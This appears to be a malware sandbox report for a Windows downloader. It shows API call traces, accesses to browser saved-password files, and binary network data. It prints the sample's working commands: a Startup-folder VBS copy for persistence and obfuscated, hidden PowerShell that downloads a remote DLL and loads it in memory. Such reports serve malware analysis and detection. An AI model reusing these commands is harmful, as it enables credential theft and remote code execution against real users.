allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028cb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028cd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028ce000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028cf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Chromium\User Data
file C:\Users\test22\AppData\Local\MapleStudio\ChromePlus\User Data
file C:\Users\test22\AppData\Local\Yandex\YandexBrowser\User Data
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwA4ADgALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD
cmdline "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "$imageUrl = 'https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f4cafe-e9ac-408c-a2cd-b2f926f8094a';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString($imageUrl));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.emitnuR/88/251.871.64.891//:ptth'))"
cmdline cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')"
cmdline powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')
cmdline powershell -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwA4ADgALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')"
filepath: cmd.exe
1 1 0

CreateProcessInternalW

thread_identifier: 2428
thread_handle: 0x000002a4
process_identifier: 2424
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwA4ADgALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000300
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwA4ADgALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD
filepath: powershell
1 1 0

CreateProcessInternalW

thread_identifier: 2520
thread_handle: 0x00000450
process_identifier: 2516
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "$imageUrl = 'https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f4cafe-e9ac-408c-a2cd-b2f926f8094a';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString($imageUrl));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.emitnuR/88/251.871.64.891//:ptth'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000454
1 1 0
Symantec ISB.Downloader!gen285
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received W
Data received Se µ=I+ã&0_qï€7|Ú­þÿ`DOWNGRD 1lkZTP(pþG× µs™>Äj“IÚUý¯HTCýµÀ ÿ 
Data received #
Data received ’
Data received ŽAÀb ÛReOãÆñ0Í/§*£Ó1k8ZU–1€Ç^k¦«’èü³ ó)»;ì(öK»E:bmÆӉ°¾G0E GIt܂‘b@?ØTá…ŸŒvì©L¿w­z¢È6¥Ô!Õîlóµß︶_t†ëiÊkîyW´šáK’ô]ž®K•
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received ×ì‚RÁóZÓôŦwŠÿ¿a^¶¬ûÁLØ aÌ·pÞø6¡Qž\Võ[V*ûÌzY
Data received p
Data received ¯töw•¯U0´O¨ª[k’Ç@ùܶç¡FÌ+Tņ¾€zÑU90²²ßadßðo˜Or•s_”ª'7Æ¿øG–<,9 ŸÆF?ñàçv÷kÚ!Íìš9BÄíºÀ™aVãZ*ٛf,_ßßÆ(ÍÆØÉÚ(H>]Ùd×z{ \c¬Àý•ìÞªu3é>©ƒÑ=ôçýöv°@OR´ê‡_"™úr%ÆÚyx?§Ô4ȦA®âW(ž]Ü·Å3êUd< "ºäº@x“øB’ò—¡mfHÜ;¹žÄ[P°ðÞÏñÐ|â6øÒk;(MYP“ö —1Q$»·”Í:‡†øFf~pLːü¢!‚A_Rª|{æå_A†<—ñ‡WTÇlފ ĸfŒí¦Ïóൢ¢nF¥•Ö‡’×(úyr݂9ýh,‰®ÏÒ·mkw fìc„h¾¯¦d->‹R‹„±w û÷êÀlä»L~Ì M¸ÿ[_žö Õݪ»4Ùð'Z÷—ö ¦ä](噎«¸yx¡^þ§;½/a›eo?è‡íP!Äâ‹Ó®#:trÓ™]Æî\C8þ<¡DÞõ¹¯•—.0õJk†©€U{²a¨Ê~b¤õÞï”êÝõ\°tòŸñQâ†Wøþï΃õBQÇÏ¢Xè{Û ( •Caè[<Š¦5†TÔY%Þ}ÈÛ÷ç!ý¦´ׁ-hñøf87X ”¶¾¤uú-,ÀòíÿZ²ÐìŠÝïÇʍH¹¢~`ÂE­|v¡• ;M]ùU†—Ý™ÓýŒ}q¬¿–˜ô†Pڹǜ0‡‰®«MæõÖeÀ¨`ޑý¹(-Ðw*8šÍur· @ÖóàÄTÃÑ¢O& âÌ·B”~@êvªiûY‚ Þ\:N %ñ¥*ýìòÓn@ƒSqýþ 6¿Hó†ζ5HŸí /×Í1þ71*Ðh¼s鑿‡b¥!<šÝ_çÖ[‰ëîGŽ´”âò«qfL…`@]ØM°¥GדJᢦÄj4ë&¢|Ú¢ª„ü`KêWˆ™ÎtyŠÓF|@(¯0̯sºk>½Š „yPb´Qø~˜éÒ«ZˆJðøêšéý^ôác•ðPà ¢2{Qéõû)"Óû•oÝ]Þ¨DãÖs#>çhd ñWkD$ùÿä4Ñ¥_”T™ÃP9ñpëì7L×ÎdJ^7Q·}ÐÉ0çUwŠ& ÝRàƪv€ü…]¨Xå«¡«t¨p\Å7¦wv³€'¬·%šTS“Ýaèy¥\ÂКÕë°ës9Dy¼ëd3=¬/ìûÞø%NêâS×pË·l×ÖÜåU)e¢S„R1+ãîÅW&ß]µ¾fºÈñ54ÍYÿmS|k/”óp=RÊÏٟԠýåKv4˜’ýLùíy=å véY/K¿íD”O怞ãcw¾y¡„j|îc$X$·a¶9Tmñ—?mY0²àF40]­‘7¬_Ⅰ•bОãS^ˆy˜àgtÀµ¶ç–<ˆüçåÁ¦ŠÁ,—Lw[6Ø|ó`&åžcüùÐ…}6øýÕ¨Ïú<3¨w«h¯yyÃLã:KÞrzⅻƒ±Ì?]¢<O…æ贐ϱwfõ÷˜£ÇóþhÒ0¿—Ôê,{öꠄuÿi`›Ip‹ú¬%©©fí§ü°Ž‚•Q#€È”Ïß(«9%D(Δa >rμöTÑ\ lªÐgË ›y:˜„\
Data received ƒ.Ãj]©jKOI#3þ«'&®.œe¯¬†±VlP¬™)±c™zWT6í’øf½t·Åo®èö-»š\_ÛÛmƒï…äy!è¶QðãÕ·Ê+6³ŠHÃë@(<b¶‹š]üÒçœumí©ª’_W0?+‹×[^t~L_QGvÓHL{‘=¿¸ÏßTAˆ_èØö¢Ù'nXF¨°¡·cЬ4¤hÍ00ÍòÓ$jÂgÒß"ôÙoO÷K”(¹§úÅþÕSIW¯ð÷ p—#_÷94–hrÙþˆa¼gx EÀögÍ&rʔðÞò9 jÊ2•Ò2ò–AôœàÝ®%²¶z—´aæÎ4Ø{3LŸÖ ‰*¹2MèdM¾$sxN[#6C㒻0tmÞ; ¡*÷qšùw~xiÊ/ÂÙ§¢ºW”dN½%QÁà¯Là_ª]Ô+£Qˆq°¯|kM8ó¾Û‰«îq®S£rÈÀ &¤P¼ˆÃ;j¼ R$jê ;^r2ÀfäÁº;MÀnѽí}ŽѼ"A.Ï­qi¡B¶ç ¿/ï\ëí뜳rr¿! k÷I^äىbÄíø#ÙȲ, ˆG$³$"•u¥3kÈø><%§O9"ÃM8-c!n•ü~Í}LÎúrcÉ[û‰<oOQîáE!-¿ôn’:¼Ë¢h¤6˜)e©ýMÝ×ñòc…JbF<d•Ö΀çSA×4ÒZ>D‘.ü׸¹9ÛhX¿?©Mÿm6g¶hEÒÛð+ÉF 3µF6(—ËZB¡$½ÎxÖٜ‡cf=²/«¸Cú¬ù@?ß UÞUBúûIjNm“k}žµ^+rÞ[ØJº6r´üoPŸHW0Ý.?A7½¨² ;ϼHµRÔÍâ&5`9·_11^²òô­¯q£qH;¢ðRi“ã‡ïïïÔã½Âc;‰‹ó4¾ÊãýÛí¨urè€g^ ¢’pÆ/vSA1ÓöBʓÇŁ¤Œa©0ÖPBìÅy}YÖ°ã9„c‚Š…E·nۚÇÏîºwã³Ú=×öõ÷ŽÎÔX'Ç|mœpïR¾m–.ëwÑmåÅÊPœ¯†½m‡™§^­T–/ºs‰–é”fù«M-§Eƒ *¦üsЋl¼ !Ä^g ͞+-,Ä×PZÄ5;Ti§»ò¯º—CԱŵ ³”ªoõÇMß;ï+è8ÒLü^XÖ¶T¬÷`j[«ät~yš6up‹ÃƒôÞ.}åÓóò\;"iàuҁ㒕Ì'u]Q›9TR/ɕ"GÉý::54êq…=˜+W‡Ú֘âÄڏ¸Ä ïGEäh\vgýF‘°ßpMöí,Ý«¿a^à´=ÆޅâfµƒÑď[¶3{a¤¼å5ˆcÜbñF"± ‰™¥I`1ÞqP¿)až°™f‘i!Ï ¾(AT8´ì)Ïñ¹[k&ÿaûR­Ä|y~÷ríså4&;$‹Ȝ2VÓ·Nê˜óK0¶u‘ظGw×|¿½—'œŒƒ×ø)**2Oà«] ðèÒ[~Úu `]®¿E­d VB³i)ԘóñúýËIVýw=ÄÙO6/Þªm`° .®1¬u! êaS§+3\÷ ¥ì ˆs§ IŽZ“Zîk áýì&ÅC‚…3d‰½¿£!€øhôÔrü.öȶÀ6ۍÓa³XGˆ2Øl¹#ÖQó8ç-ʼ].mÅTr0õö*²¹7Œ!M4>ýdý\¯®×£CÚ¾~³Ó¢™r å÷
Data received ÿS0üå½ÀÁS]‚S|S·¬h(_Jå‘™ë^1'c¦ÈHÚX Ïøtëò2ц«‡ ðw^‡¢â镆¶3U&xª󟩌˄/W8VW¯ð8ºAh@•Uæ2z&pC,Å%4“ÿ ý\u“Ò”SßpÀP¾e%XéÃíªÏ¬Œõ(`"d^â¢ÎºFܱT[ KlÍ_Ï êr2yB{ê2Îh´ÉæÝì?þkP¡uñŸ¬ùRoCV¨É’MûPŠ@ÎÐâùÖj_{å1óà܁5R¯æъ6ÁÞçm,­¡CIœ±¹ÍÑê!2ÒØn®à5ocü9ÀÄlwâÐsZòÙµn,‚iêÎjúz䂭D:5’¶mÏM¤ð4¹ Ťéb lqå':7¦Äü̍7ä±>·WKÌÄ@-yŒàk„+Û¢‘öÁ€rnÜð¦çï‹@éxTvÚ×rSrð'»i'·Gï8„ë ?Ec>€ÒÑ›M"áiÊ­zÉTå³û–Çæӄ¡¹² !=#S™ïÍa›¥=»kñ!¢B<ŒÞ¸©j<¿zßuœ\™&<Å!Pö´Ë5ºYtâØQZÙn)²ç:®usÆxYße%{µ 7“IÎßAþÆMB`Ýô¦ÓÑ)ÊDq'GŒGÇqbÐêsI`KõPïDVë'%‹-í-ÏÄ÷ð@qâ)IÑIˆ¥Ôê•ØuMQ{õ,U09[}>”2㴑Q¿YR_xVP¦dbÃSâW•íEXÚ4NŽÒúï^ڏtOl”ã@ôÒÑïʏ¹=©©ðlCŠS|•59ûŠKW%C>~W"ózl_»X«ÖÉKwßÁŒWïgo‹¬_dÜ'¯ -ÞpÙºvÛהUé÷! ´ý†‰ò%pôŽî):å3%äWVNyÉY%;º³çÙ늂B/ýiza(9†ç21Vô÷ãjj2:ՊNôÌìq1×A‹Ú7ŸÐÝzٙ¥D~Væ$ÉÃVÁòB±I föÅ~oœšöBoS Áˆ›½œÙ€"§ fþ9ê¾PHvJÄ1óöEÄÂ<Æà‡Õ—ŽÄôúA:”+Ϟ‘Ñ5ã¨Z\IõÂêÓ¦Þr9²Ú]U§yïXÞ¦«8Ä C§³Ø~ê¼5P~*&ÿ{;YI³ê[×Tá#ý»‘NhÏk—y§¿Vܳš° nè`ä5<û…ì¡ÌxÙSÄ’ÒzßfÚä¨s8¸“»Hº¾/lä¡[z,%£fÓ·¼ò’ þ}µ^ëqøþ.Kñè¾¹ïÀ„)/#/›N,i­!ú/“·òétè#¡ÇâÒë,Ì7寠ùBSç£(ÛŸ*ëV­ µi9žô9tqPGüˆŒÎ7a°Ô ×üŒäj ãîEاI՞‡ö+t6üÐ+-è>‰Ñftr„w'è(Á(m§£rÌ°´8ƒÀÃÝ@ ²ñAM¾hu•Þaî:ÙùÒ#ãZoZYóbÎ⟿íbJ#üzµ±˜çòIôkÅ?³„ÅÑ)¶6¼˜ø—=ü‰Sã,m ”ö"úÚ÷.?qèm, Ê³)t˞³_“«ÿyÉÍ'ÕÃÿwsoU¿ÊDéÓÏù69ѾýÉpÃ)úÀlŸP„zDÍ´dñTþÒ-ì3¼ Ñ|® žtFޓŴèԖ}V÷1jÞ^–+6î5Ï V¥$MlÖOSºb(`^Õ¥¹‘qaÙeêF]Ë“³íÚ7Å!зŸëÚ7šk¯6ŠàËTsrãW–D·
Data received ?bÿfµxCýÖ}i‹zè%Ÿþz²\…,þîxë4„œù"Loƒ@d0*ge¸G,3+𯖫 m¢(  åÚÖñBßGÔ ®¾ýÚhCóÞûì àË cf W¤E;Ëb Ñàô/¿<_íB(Ò·&Ý:Äje™éx¹ës»¸õ¹ÀRqÏëb5‘ŽÄ!ü-=ÁSŠÛ¸}èÑQ9=Õm,fò";7%Ô3û4®ç•k†}>µ½€ÚOñ´Ó¹‡Ü$àí¯º|z)>Žš48q}æP•î'Ä¡¾úDã3eÀ˜v¨’€^ÅóR$-¹0wÊY7#í0ž I…ÄuTCˆS+Jz7æPåû#𹌚éÿ~%”³—.sS½'R¯bÓ·2éò-+Ѧ9[ò¶ûË2 „m'Ãæ–Ô¸?þy”(3Å´Šó³ÿÓc{ë+ÿ‡[¦•!õhh>GOõ*ÃήOvîÑuRü‚èI.çUØ«§?¬{¦Á°¢_¿ðØwñ€¦#zó…Nìg˜ê“ ¦«bœ¹¸w6X¤8·×K÷( Ԇêùpbäú¹=´ÊEIµZíB5§ˆECÎ,û'ևgx„íëPVúµuÇA¶Qížú9F¹b‹Å1¾÷èÿ‚vºÍ—BžãŽøÞ#“—{*ÈAJ™ Þ!X8ê‡xîï}\÷ùsßX®Ús…a¨S¨ÉóLžZ¬DÛ°÷\!ù]År£#©XÞÈ^çǁõh6‘H 0w‰pŽ÷ñ–ý)ÓqÐ,QP˜PZ:1S¿.b¾‹G`µÿ/DšaC‡Ïþ.+»moE^= þAõœÔ©·ÚrSÔʬ: ì x`> ±kÇÕ úòÐS¸&4ë÷ lED–—}„½3ÕNCoƒ…Ìsûå5á§ß'@ÒPU® ÕWÂùÀ*ƒé÷¡Íþ‡l#Ûñ±åg|=nÝÉc3u[SB: Ø!ÆÀêº0ú}z¡ ~©ãÕÏË:3Ú0‹v²/þr@ï#§WÙïå‡ò~JYÅdéÒ++¯…ÎõÖ ˆþôñ'q† Ô͇ É9mŸ••/ÿÑÆwåââô|B×:<q:Î,Š^Šl]n˜ R¦æåFÆHÖê¿&2÷¿z—o#ƒæƶÔâj 5SÅdL¦à]×[LáEµM?õ°ß'dØS^¹Ú ®ËóGÑ¢…ƒ™ü`þ¸«cKvLñ¦F+Û·zÊQ4ªŽŸrÔ׳Tu8Ú²ˆeëúý0#bP°ÆÜ`^*mÿìÖ`1±gö{^l>¼’úmÇ‚¹-k™6X´f Kyå¿8í'ÎÐ'/pXŸG£ðƒÒc1¬@ÃÝþ °¹¹-HñãAÅRor ‡µdê?üw”¯Ÿ?–ÓO9ÄÓƒ@fï~dT¤Yɲç˜hHm ÉbçƒÉ4´8R,u®€<ykL­ÕՁž8Ÿü € ò°ƒ†n©Rù°™}¹=U•¹.EKM=ÌJà¯Ï^¿Ür…OÀ]ғFNnY:i+ÑUÿaeŸåüL5  ©Î•E×SΗç?* ²É)PCkº‚'Yõ\遬0Ëè»t|Q{Ŭ¡ØÞ~Ô>>*"ÀKRÇ»Þ#¼&€}s‚|ûˆEdñP… ¥É ߟ¦Ìð_Ùüu 